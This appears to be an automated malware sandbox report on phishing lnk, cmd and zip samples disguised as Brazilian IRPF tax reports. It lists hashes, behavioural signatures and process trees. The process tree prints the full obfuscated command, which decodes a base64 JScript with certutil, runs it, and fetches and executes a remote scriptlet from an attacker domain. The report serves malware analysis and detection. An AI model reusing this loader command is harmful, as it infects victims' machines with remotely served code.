Overview
overview
8Static
static
ORDEM20DE2...56.zip
windows10-2004-x64
1ORDEM20DE2...85.cmd
windows10-2004-x64
8ORDEM20DE2...85.lnk
windows10-2004-x64
8RelatorioI...bf.zip
windows10-2004-x64
1RelatorioI...34.lnk
windows10-2004-x64
8RelatorioI...d5.zip
windows10-2004-x64
1RelatorioI...89.lnk
windows10-2004-x64
8RelatorioI...66.zip
windows10-2004-x64
1RelatorioI...04.lnk
windows10-2004-x64
8RelatorioI...89.zip
windows10-2004-x64
1RelatorioI...80.lnk
windows10-2004-x64
8RelatorioI...93.zip
windows10-2004-x64
1RelatorioI...03.lnk
windows10-2004-x64
8RelatorioI...59.zip
windows10-2004-x64
1RelatorioI...14.lnk
windows10-2004-x64
8RelatorioI...09.zip
windows10-2004-x64
1RelatorioI...73.lnk
windows10-2004-x64
7RelatorioI...17.zip
windows10-2004-x64
1RelatorioI...95.zip
windows10-2004-x64
1RelatorioI...15.zip
windows10-2004-x64
1RelatorioI...49.zip
windows10-2004-x64
1RelatorioI...73.zip
windows10-2004-x64
1RelatorioI...86.zip
windows10-2004-x64
1RelatorioI...51.zip
windows10-2004-x64
1RelatorioI...13.zip
windows10-2004-x64
1RelatorioI...39.zip
windows10-2004-x64
1RelatorioI...39.zip
windows10-2004-x64
1RelatorioI...61.zip
windows10-2004-x64
1Analysis
-
max time kernel
62s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
20/12/2022, 14:49
Static task
static1
Behavioral task
behavioral1
Sample
ORDEM20DE20SERVICO_3723658_257.52281.65156.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral2
Sample
ORDEM20DE20SERVICO_3723658_257.52281487.681164.08685.cmd
Resource
win10v2004-20220812-en
Behavioral task
behavioral3
Sample
ORDEM20DE20SERVICO_3723658_257.52281487.681164.08685.lnk
Resource
win10v2004-20221111-en
Behavioral task
behavioral4
Sample
RelatorioIRPF2022govbr5c3db59959bf.zip
Resource
win10v2004-20220901-en
Behavioral task
behavioral5
Sample
RelatorioIRPF2022govbr5c3db59959bf244.368958.21034.lnk
Resource
win10v2004-20220812-en
Behavioral task
behavioral6
Sample
RelatorioIRPF2022govbrb1143240a1d5.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral7
Sample
RelatorioIRPF2022govbrb1143240a1d5995.562115.49789.lnk
Resource
win10v2004-20221111-en
Behavioral task
behavioral8
Sample
RelatorioIRPF2022x_014.65300.83266.zip
Resource
win10v2004-20220812-en
Behavioral task
behavioral9
Sample
RelatorioIRPF2022x_014.65300529.531872.49304.lnk
Resource
win10v2004-20221111-en
Behavioral task
behavioral10
Sample
RelatorioIRPF2022x_104.32165.98789.zip
Resource
win10v2004-20220901-en
Behavioral task
behavioral11
Sample
RelatorioIRPF2022x_104.32165858.739349.99080.lnk
Resource
win10v2004-20220812-en
Behavioral task
behavioral12
Sample
RelatorioIRPF2022x_169.98458.00393.zip
Resource
win10v2004-20220812-en
Behavioral task
behavioral13
Sample
RelatorioIRPF2022x_169.98458933.600712.90503.lnk
Resource
win10v2004-20221111-en
Behavioral task
behavioral14
Sample
RelatorioIRPF2022x_204.11764.46059.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral15
Sample
RelatorioIRPF2022x_204.11764896.963161.08114.lnk
Resource
win10v2004-20220812-en
Behavioral task
behavioral16
Sample
RelatorioIRPF2022x_304.18016.08909.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral17
Sample
RelatorioIRPF2022x_304.18016813.095072.77073.lnk
Resource
win10v2004-20220901-en
Behavioral task
behavioral18
Sample
RelatorioIRPF2022x_319.23202.27717.zip
Resource
win10v2004-20220812-en
Behavioral task
behavioral19
Sample
RelatorioIRPF2022x_433.38734.41295.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral20
Sample
RelatorioIRPF2022x_437.03181.56215.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral21
Sample
RelatorioIRPF2022x_596.25619.99549.zip
Resource
win10v2004-20220812-en
Behavioral task
behavioral22
Sample
RelatorioIRPF2022x_700.89671.95873.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral23
Sample
RelatorioIRPF2022x_728.73414.79886.zip
Resource
win10v2004-20220812-en
Behavioral task
behavioral24
Sample
RelatorioIRPF2022x_774.19556.04451.zip
Resource
win10v2004-20220901-en
Behavioral task
behavioral25
Sample
RelatorioIRPF2022x_898.87816.47913.zip
Resource
win10v2004-20221111-en
Behavioral task
behavioral26
Sample
RelatorioIRPF2022x_950.42835.19339.zip
Resource
win10v2004-20220812-en
Behavioral task
behavioral27
Sample
RelatorioIRPF2022x_963.92207.96439.zip
Resource
win10v2004-20220812-en
Behavioral task
behavioral28
Sample
RelatorioIRPF2022x_973.20212.77261.zip
Resource
win10v2004-20220812-en
General
-
Target
RelatorioIRPF2022x_304.18016813.095072.77073.lnk
-
Size
505B
-
MD5
9609bb597e9252fe02fa47c21f901b27
-
SHA1
4f541c68aa32526ff1e39700de48046bcc201a26
-
SHA256
9efdc296086b6c3eb4c05d6833f865550c2b41dc645465d6c332efb5d0ae3e17
-
SHA512
8da6c24396304d979e4a88b93ba99d851052199f4cb62450ecb95df53893ecc8f13f74190aece127510aa1a769763cac44c26523360b25afefbc6cc445420668
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2816 conhost.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2928 wrote to memory of 2816 2928 cmd.exe 83 PID 2928 wrote to memory of 2816 2928 cmd.exe 83 PID 2816 wrote to memory of 4108 2816 conhost.exe 82 PID 2816 wrote to memory of 4108 2816 conhost.exe 82
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\RelatorioIRPF2022x_304.18016813.095072.77073.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "MD C: MCG6PY\>nul&&s^eT KTPQ=C: MCG6PY\^tMCG6PY&&echo dmFyIENJdjA9InNjIisiciI7REl2MD0iaXAiKyJ0OmgiO0VJdjA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDSXYwK0RJdjArRUl2MCsiLy93OGl1bHIuY3l1Z2ZjcmdmbmdoeXVqa3VodGd5cmZlLmN5b3UvPzEvIik7>!KTPQ!.^Js&&certutil -f -decode !KTPQ!.^Js !KTPQ!.^Js&&CMD /c !KTPQ!.^Js"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2816
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /V/D/c "MD C: MCG6PY\>nul&&s^eT KTPQ=C: MCG6PY\^tMCG6PY&&echo dmFyIENJdjA9InNjIisiciI7REl2MD0iaXAiKyJ0OmgiO0VJdjA9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDSXYwK0RJdjArRUl2MCsiLy93OGl1bHIuY3l1Z2ZjcmdmbmdoeXVqa3VodGd5cmZlLmN5b3UvPzEvIik7>!KTPQ!.^Js&&certutil -f -decode !KTPQ!.^Js !KTPQ!.^Js&&CMD /c !KTPQ!.^Js"1⤵PID:4108
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5eb06a2f644b9218524229f4ae441102e
SHA1f7b394bf78912215a709ca55f546c90c3a1aaa2a
SHA2568dad8fc025c111d63562859b93122624bc9c6c17b1bc8b124b54be79377bd74d
SHA51257198b85b06784ecdcaa009f217b16f6ecb718f5b256f9a5e926d118f3f62ec121f43108339f893c0e5f74e543c30c76d5ea8e554d979287854e4ba9de0980b0